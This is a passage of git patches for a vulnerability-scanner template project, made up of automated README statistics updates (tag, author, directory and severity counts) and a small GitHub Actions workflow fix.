| | -| bolt | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| circleci | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| asana | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| twitter | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| clockwork | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | | place | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| dbeaver | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| cockpit | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| photo | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| okiko | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| jumpcloud | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | | directions | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| spotify | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| instagram | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| syslog | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| square | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| key | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| contentkeeper | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| messaging | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| cves2001 | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| phpshowtime | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | | pagerduty | 1 | | | | | | | | | | node-red-dashboard | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| hubspot | 1 | | | | | | | | | -| ognl | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| omi | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| elasticsearch | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| calendly | 1 | | | | | | | | | -| testrail | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| geocode | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| skycaiji | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| deviantart | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| etherpad | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| photo | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | | daybyday | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| weather | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| graph | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| cve202 | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| digitalocean | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| package | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| mailgun | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| find | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| sendgrid | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| bing | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| circle | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| adiscon | 1 | | | | | | | | | +| twitter | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| matrix | 1 | | | | | | | | | +| distance | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| circleci | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 7c569d4d19..57c3d4e612 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 832 | daffainfo | 288 | cves | 836 | info | 750 | http | 2211 | +| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 | | lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | -| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 270 | medium | 475 | network | 45 | +| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | | wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | | exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | | rce | 214 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 197 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 67 | default-logins | 60 | | | | | -| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | +| tech | 196 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 165 | madrobot | 63 | file | 50 | | | | | From e10c3ff7dac2c23c006957c6a6dc844ba9d8902b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 20:41:34 +0000 Subject: [PATCH 37/54] Auto README Update [Mon Oct 18 20:41:34 UTC 2021] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index 7c8bd1cd86..b485b2512e 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | -| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | -| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| cve | 832 | daffainfo | 288 | cves | 836 | info | 750 | http | 2211 | +| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | +| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 270 | medium | 475 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | -| rce | 212 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | +| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | +| rce | 214 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 197 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 175 | princechaddha | 67 | default-logins | 60 | | | | | +| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | -**176 directories, 2381 files**. +**176 directories, 2382 files**. From db8a1bda6f7a1e8e1e24a751a70efdf9bca99b70 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 19 Oct 2021 02:23:08 +0530 Subject: [PATCH 38/54] workflow fix to run on release / create tag only --- .github/workflows/templates-stats.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 22f43e7261..6132ebfa0b 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -2,14 +2,12 @@ name: 🗒 Templates Stats on: create: - tags: - - v* workflow_dispatch: jobs: build: runs-on: ubuntu-latest - if: github.repository == 'projectdiscovery/nuclei-templates' + if: ${{ startsWith(github.ref, 'refs/tags/v') }} steps: - uses: actions/checkout@master - uses: actions/setup-go@v2 From e6cd0981c106c0f279d515f3850efb122467349b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 20:53:36 +0000 Subject: [PATCH 39/54] Auto README Update [Mon Oct 18 20:53:35 UTC 2021] :robot: --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index b485b2512e..9c53b7c938 100644 --- a/README.md +++ b/README.md @@ -42,16 +42,16 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 832 | daffainfo | 288 | cves | 836 | info | 750 | http | 2211 | +| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 | | lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | -| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 270 | medium | 475 | network | 45 | +| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | | wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | | exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | | rce | 214 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 197 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 67 | default-logins | 60 | | | | | -| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | +| tech | 196 | pussycat0x | 